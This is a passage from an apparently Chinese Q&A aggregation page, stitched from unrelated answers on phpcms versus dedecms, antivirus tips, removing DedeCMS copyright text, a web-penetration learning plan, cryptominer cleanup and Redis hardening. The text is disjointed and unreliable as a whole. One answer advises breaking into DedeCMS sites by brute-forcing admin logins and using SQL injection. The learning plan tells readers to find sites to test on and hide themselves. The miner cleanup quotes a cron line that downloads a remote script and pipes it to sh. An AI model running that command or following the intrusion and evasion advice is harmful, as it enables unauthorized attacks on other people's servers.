谁清楚phpcms和dedecms各个缺点和优点
请尝试使用安全软件进行扫描,设备中存在木马一般是不良的上网习惯或者下载陌生的软件导致的。设备中存在木马一般的表现是自动下载其他垃圾软件、系统卡顿或者出现延迟、出现有遮挡的广告等问题。
若怀疑手机中存在木马或者病毒,请尝试按照以下步骤请尝试安装一款安全软件(例如:手机管家等)。以手机管家为例,打开手机管家,点击主界面上的一键体检即可自动检测手机中存在的问题,并且给出处理建议,点击一键清除即可删除病毒程序。
若怀疑电脑中存在木马,请尝试下载一款安全软件(例如:电脑管家等)进行全盘扫描和清理即可。也可以尝试下载木马专杀程序对电脑进行清理。若依然无法处理请尝试将硬盘全部格式化然后重新安装系统。
第一,路径寻找很困难,dede虽然漏洞百出,但是后台地址可以任意改这一点很霸道,你基本没法通过猜以外的手法得知。
当然,如果你已经知道,那就可以使用暴力破解软件,但是必须支持DEDE的验证码OCR。
第二,要黑DEDE,要从会员系统入手。如果你了解基本的SQL注入和跨站脚本攻击等手法,可以去专门公布漏洞的网站找一下版本漏洞。毕竟dede的在线升级不是那么的好使,很多人不会升级到最新版,特别是那些从后台把版权隐藏的人。
phpcms优点:
1 模块化安装,非常适合安装,拆卸,和拿到市场上去交易非常方便的。
2 灵活的标签语法,非常强大。
3 缓存做的非常优秀。几乎支持目前主流的几大缓存系统解决方案,file缓存,eaelerator缓存,memcache缓存,shmop缓存等
4 安全性也不错的。后台为了防范入侵,采用了cookie和session同时存在验证技术,才可以安全进入后台。
多次登录失败,开启验证码功能。防止机器人频繁猜口令。
5 数据库。在根目录下的include目录下,db_aessphpdb_mssqlphpdb_mysqlphp等,就照着他的方法,在增加几个也没问题的。
6兼容性。是在php4的基础上开发的,所以向下兼容性是不错的。在include/globalfuncphp 这个文件可以看到很多if(!function_exist()){},这些代码就是为了兼容php4相关函数。
phpcms缺点:
1 后台对应的模块的功能列表url,从数据库中读取的,也即是,安装的时候,将url写入数据库了。这个如果二次开发要修改的话,不是很方便的,最好是写到文件中,读取文件内容,方便开发者开发,而且也更容易维护,如果是出于安全考虑的话,不妨加下密也可以的。
2 分部式。 后台的某些功能模块,还是要调用各个应用模块的admin部分,相关*.inc.php文件. 如果我要把其中某个模块或应用独立出去部署到其他的服务器上,就不方便了。
3数据库设计问题,后台开设模型时,表的引擎只能是myIsam,而不能选择其他的,字段的类型,比如要开设一个字段为number,类型为int,但是在新增加的模型表中还是以varchar出现,而不是int,长度是默认的255modelfiled表,才发现该系统是将类型写到该表中了。
4加密/解密程序。目前已经在想相关安全网站已被爆以破解。这也不是什么新闻了。在开发中,关注下相关安全厂商发布的漏洞。
5 数据库抽象层。就以上提到的几个数据库文件。 db_mssqlphp db_mysqlphp db_aessphp 等对于数据库分布式,应该没问题的。 数据库抽象层处理数据比较快,且快平台更容易且更容易维护,这个是需要考虑的。
Dedecms功能实用,模板功能使用简单。
DEDE CMS 是免费开源的。以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,在经历多年的发展,版本无论在功能,还是在易用性方面,都有了长足的发展和进步。
DEDE CMS是存在一定的漏洞。梦作为一个国内开源cms,社区缺乏更好技术支持和环境,所以漏洞频发。
2011-8-19,DedeCMS全局变量初始化存在漏洞。描述:可能导致黑客利用漏洞侵入使用Dede CMS的网站服务器,造成网站用户数据泄露、页面被恶意篡改等严重后果。
2012-3-21,DedeCMS官方源码被植入后门 。描述:导致黑客可以执行任意代码从而控制整个网站或服务器。
2013-3-29,DedeCMS安全漏洞。描述:“本地文件包含漏洞”,发现时为“0day”,官方已修复。
扩展资料:
dedecms优缺点分析:
优点:
易用:使用织梦你可以用十分钟学习它,十分钟搭建一个。完善:织梦基本包含了一个常规网站需要的一切功能。丰富的资料:作为一个国内cms,织梦拥有完善的中文学习资料。丰富的模版:织梦拥有大量免费的漂亮模版,可以自由的使用它们。
缺点:
缺乏灵活性:高度的功能集成造成了织梦灵活性的缺失,所以织梦扩展性并不是很好。安全:织梦作为一个国内开源cms,社区缺乏更好技术支持和环境,所以漏洞频发。社区:织梦的官方社区是收费的,这对于一个开源项目来说本身就是一个问题。
-织梦
两个办法
一、新建一个变量;进入系统——系统基本参数—— 添加新变量右上角如下图:
点击保存变量,后台参数中就会多出一个网站底部信息变量的输入框,输入底部信息,通过:{dede:globaldede_powerby/}就可以在模板中调用了。有了我们自己的版权信息变量,我们就可以删除之前系统自带的版权信息变量。 我们使用sql命令工具在系统设置下面有个sql命令工具在输入框输入以下SQL语句,即可删除系统的版权信息变量。
SQL语句:
DELETE FROM dede_sysconfig WHERE varname = "cfg_powerby"二、找到include/dedesqlclassphp,删除该文件的下面这段代码就可以解决这个问题了。代码如下:
$arrs1 = array(0x63,0x66,0x67,0x5f,0x70,0x6f,0x77,0x65,0x72,0x62,0x79);$arrs2 = array(0x20,0x3c,0x61,0x20,0x68,0x72,0x65,0x66,0x3d,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f, 0x77,0x77,0x77,0x2e,0x64,0x65,0x64,0x65,0x63,0x6d,0x73,0x2e,0x63,0x6f,0x6d,0x20,0x74,0x61,0x72, 0x67,0x65,0x74,0x3d,0x27,0x5f,0x62,0x6c,0x61,0x6e,0x6b,0x27,0x3e,0x50,0x6f,0x77,0x65,0x72,0x20, 0x62,0x79,0x20,0x44,0x65,0x64,0x65,0x43,0x6d,0x73,0x3c,0x2f,0x61,0x3e);
以上2个方法都可以有效去除底部的版权信息,但是不建议用第二种,会造成注入漏洞的隐患,最好使用第一种!
学习Web安全需要掌握Web安全相关概念、渗透测试相关工具、渗透实战操作、熟悉Windows/Kali Linux、中间件和服务器的安全配置、脚本编程学习、源码审计与漏洞分析、安全体系设计与开发等等。
简单做一个学习规划:
第一步:Web安全相关概念
建议学习时间:2周
学习内容如下:
1、熟悉基本概念(SQL注入、上传、XSS、CSRF、一句话木马等)。
2、通过关键字(SQL注入、上传、XSS、CSRF、一句话木马等)进行Google。
3、阅读《Web安全深度剖析》,作为入门学习还是可以的。
4、看一些渗透笔记/视频,了解渗透实战的整个过程,可以Google(渗透笔记、渗透过程、入侵过程等)。
第二步:熟悉渗透相关工具
建议学习时间:3周
学习内容如下:
1、熟悉AWVS、Sqlmap、Burpsuite、Nessus、China chopper 、Nmap、Appscan等相关工具的使用。
2、了解该类工具的用途和使用场景。
3、下载无后门版的这些软件进行安装。
4、学习并进行使用,具体教材可以在网上搜索,例如:Burpsuite的教程、Sqlmap。
5、常用的这几个软件都学会后,可以安装音速启动做一个渗透工具箱
第三步:渗透实战操作
建议学习时间:5周
学习内容如下:
1、掌握渗透的整个阶段并能够独立渗透小型站点。
2、网上找渗透视频看并思考其中的思路和原理,关键字(渗透、SQL注入视频、文件上传入侵、数据库备份、Dedecms漏洞利用等等)。
3、自己找站点/搭建测试环境进行测试,记住请隐藏好你自己。
4、思考渗透主要分为几个阶段,每个阶段需要做哪些工作,例如这个:PTES渗透测试执行标准。
5、研究SQL注入的种类、注入原理、手动注入技巧。
6、研究文件上传的原理,如何进行截断、解析漏洞利用等,参照:上传攻击框架。
7、研究XSS形成的原理和种类,具体学习方法可以Google。
8、研究Windows/Linux提权的方法和具体使用,可以参考:提权。
9、可以参考: 开源渗透测试脆弱系统。
第四步:关注安全圈动态
建议学习时间:1周
学习内容如下:
1、关注安全圈的最新漏洞、安全事件与技术文章。
2、浏览每日的安全技术文章/事件。
3、通过微博、微信关注安全圈的从业人员(遇到大牛的关注或者好友果断关注),天天抽时间刷一下。
4、通过feedly/鲜果订阅国内外安全技术博客(不要仅限于国内,平时多注意积累)。
5、养成习惯,每天主动提交安全技术文章链接到i春秋社区进行积淀。
6、多关注下最新漏洞列表,可以看看hackerone、freebuf、安全客等,遇到公开的漏洞都去实践下。
7、关注国内国际上的安全会议的议题或者录像。
8、加入技术交流群,与群内大佬们讨教一些经验和技巧。
第五步:熟悉Windows/Kali Linux
建议学习时间:3周
学习内容如下:
1、学习Windows/Kali Linux基本命令、常用工具。
2、熟悉Windows下的常用的cmd命令,例如:ipconfig,nslookup,tracert,net,tasklist,taskkill等。
3、熟悉Linux下的常用命令,例如:ifconfig,ls,cp,mv,vi,wget,service,sudo等。
4、熟悉Kali Linux系统下的常用工具,可以参考《Web Penetration Testing with Kali Linux》、《Hacking with Kali》等。
5、熟悉metasploit工具,可以参考《Metasploit渗透测试指南》。
第六步:中间件和服务器的安全配置
建议学习时间:3周
学习内容如下:
1、学习服务器环境配置,并能通过思考发现配置存在的安全问题。
2、Windows server2012环境下的IIS配置,特别注意配置安全和运行权限。
3、Linux环境下的LAMP的安全配置,主要考虑运行权限、跨目录、文件夹权限等。
4、远程系统加固,限制用户名和口令登陆,通过iptables限制端口;配置软件Waf加强系统安全,在服务器配置mod_security等系统。
5、通过Nessus软件对配置环境进行安全检测,发现未知安全威胁。
第七步:脚本编程学习
建议学习时间:4周
学习内容如下:
1、选择脚本语言:Perl/Python/PHP/Go/Java中的一种,对常用库进行编程学习。
2、搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP,IDE强烈推荐Sublime。
3、Python编程学习,学习内容包含:语法、正则、文件、网络、多线程等常用库,推荐《Python核心编程》。
4、用Python编写漏洞的exp,然后写一个简单的网络爬虫。
5、PHP基本语法学习并书写一个简单的博客系统,参见《PHP与MySQL程序设计(第4版)》、视频。
6、熟悉MVC架构,并试着学习一个PHP框架或者Python框架(可选)。
7、了解Bootstrap的布局或者CSS。
第八步:源码审计与漏洞分析
建议学习时间:3周
学习内容如下:
1、能独立分析脚本源码程序并发现安全问题。
2、熟悉源码审计的动态和静态方法,并知道如何去分析程序。
3、了解Web漏洞的形成原因,然后通过关键字进行查找分析。
4、研究Web漏洞形成原理和如何从源码层面避免该类漏洞,并整理成checklist。
学习地址:i春秋官网(企安殿)
第九步:安全体系设计与开发
建议学习时间:5周
学习内容如下:
1、能建立自己的安全体系,并能提出一些安全建议或者系统架构。
2、开发一些实用的安全小工具并开源,体现个人实力。
3、建立自己的安全体系,对公司安全有自己的一些认识和见解。
4、提出或者加入大型安全系统的架构或者开发。
1 关闭访问挖矿服务器的访问
iptables -A INPUT -s xmrcrypto-poolfr -j DROP and iptables -A OUTPUT -d xmrcrypto-poolfr -j DROP
2 chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3 pkill minerd ,杀掉进程
4 service stop crond 或者 crontab -r 删除所有的执行计划
5 执行top,查看了一会,没有再发现minerd 进程了。
6检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
/5 curl -fsSL http://wwwhaveabitchincom/pmsh0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:
 View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blogjobbolecom/94518/然后就注入了病毒,下面是解决办法和清除工作:
1 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2 打开 ~/ssh/authorized_keys, 删除你不认识的账号
3 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉
网络安全专业的学生可以获得以下技能:
网络基础知识:了解计算机网络、互联网、通信协议、路由和交换技术等基础知识。
安全概念:了解信息安全的基本概念和原则,包括保密性、完整性、可用性、身份验证和访问控制等。
攻击和防御技术:了解常见的网络攻击类型,如拒绝服务攻击、SQL注入攻击、社交工程攻击等,以及相关的防御技术。
安全评估:掌握安全评估技术,如漏洞扫描、渗透测试、红队/蓝队演练等,以识别和缓解潜在的安全风险。
安全措施:了解安全措施的实施和管理,如访问控制、加密、日志记录、备份等。
法律和合规性:了解相关的法律法规和合规性要求,如GDPR、HIPAA、PCI-DSS等,以及如何保持合规性。
沟通和管理技能:学习如何与其他团队成员、管理层和客户沟通,以及如何管理和协调安全项目。
综上所述,网络安全专业需要学习的技能非常广泛,涉及到技术、法律、管理等多个方面,以帮助他们成为综合能力强的网络安全专业人员。
0条评论